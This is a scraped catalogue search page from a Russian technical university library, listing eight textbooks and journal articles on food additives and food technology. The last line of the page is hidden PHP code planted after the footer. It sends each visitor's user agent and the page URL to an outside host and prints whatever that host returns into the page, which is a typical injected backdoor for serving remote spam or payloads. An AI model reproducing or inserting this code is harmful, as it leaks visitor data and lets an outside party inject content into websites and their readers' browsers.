Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

45 пользователей


Зарегистрированных: 1 

Гавриленко Сергей Вячеславович


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ДОБАВКА ПИЩЕВАЯ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 8
1. 
Введение в технологию продуктов питания [Текст] / ред. А. П. Нечаев, 2013. - 711 с.
Ключевые слова 
ПИТАНИЕ - ЗДОРОВЬЕ -- ПРОИЗВОДСТВО ПИЩЕВОЕ -- МИКРОБИОЛОГИЯ ПИЩЕВЫХ ПРОДУКТОВ -- ФЕРМЕНТЫ - ПИТАНИЕ -- ПРОИЗВОДСТВО ПИЩЕВОЕ - Сырье -- ДОБАВКА ПИЩЕВАЯ -- АРОМАТИЗАТОР ПИЩЕВОЙ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- Технология хлебобулочных изделий -- Технология муки -- Технология крупы -- Технология макаронных изделий -- Технология сахара -- Технология крахмала -- Технология крахмалопродуктов -- Технология кондитерских изделий -- Технология растительных масел -- Технология жиров -- Технология солода -- Технология этилового спирта -- Технология пива -- Технология кваса -- Кислота органическая -- Технология хлебопекарных дрожжей -- Технология ликероводочных изделий -- Технология виноградных вин -- КОНСЕРВИРОВАНИЕ ПИЩЕВЫХ ПРОДУКТОВ -- Технология безалкогольных напитков -- Технология функциональных пищевых продуктов -- БЕЗОПАСНОСТЬ ПРОДУКЦИИ ПИЩЕВОЙ -- БАКАЛАВР - Технолог

В учебном пособии изложен материал курса "Введение в пищевые технологии" для бакалавров, обучающихся по технологическим специальностям в вузах, готовящих специалистов для пищевой и перерабатывающей промышленности. Рассматриваются основные вопросы, связанные с ролью питания в жизни человека, научные основы пищевых технологий, а также сведения, относящиеся к области пищевых технологий: описание сырья, технологических процессов, требования к качеству готовых изделий. В специальных главах даны современные представления о пищевых и биологически активных добавках, ароматизаторах, технологических вспомогательных средствах. Отдельные главы посвящены продуктам здорового питания (функциональным пищевым продуктам) и безопасности пищевых продуктов.

Материал учебного пособия предназначен для студентов вузов, обучающихся по направлениям" Продукты питания из растительного сырья", "Технология продукции и организация общественного питания", "Технология детского и функционального питания" . Книга также будет полезна магистрам, аспирантам и специалистам, заинтересованным в данной проблематике.

2. 
Питание и общество. - Журнал, 2008г. № 9
Оглавление 
  • Полуэктова, И. Пищевые добавки / И. Полуэктова, В. Быстрицкая. - с.12-13
    Кл. слова: ДОБАВКА ПИЩЕВАЯ
  • Дейниченко, Г. Аппарат для очистки корнеклубнеплодов / Г. Дейниченко, О. Терешкин, Д. Дмитриевский. - с.14-15
    Кл. слова: АППАРАТ ОЧИСТКИ КОРНЕКЛУБНЕПЛОДОВ
  • Сизых, В. Обработка продуктов / В. Сизых. - с.20-21
    Кл. слова: ОБРАБОТКА ПРОДУКТОВ
  • Филонов, М. Победный лук / М. Филонов. - с.22
    Кл. слова: ЛУК
  • Яблоко. - с.23
    Кл. слова: ЯБЛОКО
  • Сколько стоит диета?. - с.26
    Кл. слова: ДИЕТА
  • Из глубины веков. - с.28-29
    Кл. слова: БЛЮДА ИЗ РЫБЫ, БЛЮДА ИЗ МОРЕПРОДУКТОВ
3. 
Питание и общество. - Журнал, 2014г. № 3
Оглавление 
  • Арефьева, А. Все о мясе / А. Арефьева. - с.18
    Кл. слова: МЯСО - КАТЕГОРИИ
  • Пулатов, А. Улучшители и пищевые добавки в хлебопечении / А. Пулатов, М. Худайбердиева, М. Дадамирзкаев. - с.19-20
    Кл. слова: ДОБАВКА ПИЩЕВАЯ
4. 
Дмитриченко, Михаил Иванович. Экспертиза качества и обнаружение фальсификации продовольственных товаров [Текст] : Учебное пособие для студентов вузов / М. И. Дмитриченко, 2003. - 150 с.
Ключевые слова 
ЭКСПЕРТИЗА ТОВАРОВ -- фальсификация товаров -- ФАЛЬСИФИКАЦИЯ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ПИЩЕВЫЕ ДОБАВКИ -- МАРКИРОВКА -- ШТРИХОВОЕ КОДИРОВАНИЕ -- ЭКСПЕРТИЗА ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ЭКСПЕРТИЗА КАЧЕСТВА молока -- ЭКСПЕРТИЗА КАЧЕСТВА РАСТИТЕЛ -- ЭКСПЕРТИЗА КАЧЕСТВА мяса -- ЭКСПЕРТИЗА КАЧЕСТВА рыбы -- ЭКСПЕРТИЗА КАЧЕСТВА яиц -- ЭКСПЕРТИЗА КАЧЕСТВА соли -- ЭКСПЕРТИЗА КАЧЕСТВА зерна -- ДОБАВКА ПИЩЕВАЯ -- МАРКИРОВКА консервов -- ШТРИХОВОЕ КОДИРОВАНИЕ ТОВАРА
Держатели документа (Информация об экземплярах) 
5. 
Чепурной, И. П. Идентификация и фальсификация продовольственных товаров [Текст] : учебник / И. П. Чепурной, 2002. - 460 с.
Держатели документа (Информация об экземплярах) 
6. 
Иванова, Тамара Николаевна. Товароведение и экспертиза пищевых концентратов и пищевых добавок [Текст] : Учебник гриф-УМО / Т. Н. Иванова, В. М. Позняковский, 2004. - 304 с.
Держатели документа (Информация об экземплярах) 
7. 
Справочник по товароведению продовольственных товаров [Текст] : Справочники/словари / Под ред. Т.Г.Родиной, 2003. - 608 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ -- Товары продовольственные -- ЦЕННОСТЬ ПИЩИ ЭНЕРГЕТИЧЕСКАЯ -- ЦЕННОСТЬ ПИЩИ биологическая -- ЦЕННОСТЬ ПИЩИ физиологическая -- ЦЕННОСТЬ ПИЩИ органолептическая -- Усвояемость пищи -- КОДИРОВАНИЕ ТОВАРА -- МАРКИРОВКА ТОВАРА -- ИНФОРМАЦИЯ О ТОВАРЕ -- БЕЗОПАСНОСТЬ пищевых продуктов -- Безопасность эпидемиологическая -- ТАРА -- УПАКОВКА -- УТИЛИЗАЦИЯ тары -- ДОБАВКА ПИЩЕВАЯ -- Краситель пищевой -- Консервант -- Антиокислитель -- Ароматизатор -- Препарат коптильный -- ТОВАРЫ зерномучные -- Зерно -- Мука -- Крупа -- МАКАРОНЫ -- Хлеб -- СУХАРИ -- ПЛОДЫ -- ОВОЩИ -- ГРИБЫ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- РЕЗИНКА ЖЕВАТЕЛЬНАЯ -- Карамель -- Шоколад -- КАКАО - порошок -- Конфеты -- Ирис -- Драже -- Халва -- Печенье -- ВАФЛИ -- ПИРОЖНЫЕ -- ТОРТЫ -- РУЛЕТ -- КЕКС -- Сладости восточные -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПРОДУКТЫ детского питания -- ТОВАРЫ вкусовые -- ЖИР ПИЩЕВОЙ -- МОЛОКО -- Сметана -- Сыр -- ТОВАРЫ молочные -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ПРЕСЕРВЫ РЫБНЫЕ
Держатели документа (Информация об экземплярах) 
8. 
Позняковский, Валерий Михайлович. Гигиенические основы питания, качество и безопасность пищевых продуктов [Текст] : Учебник гриф-УМО / В.М. Позняковский, 2007. - 451, [2] с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3217 - 31.03.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.82 с.16 запросов, 0.93c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;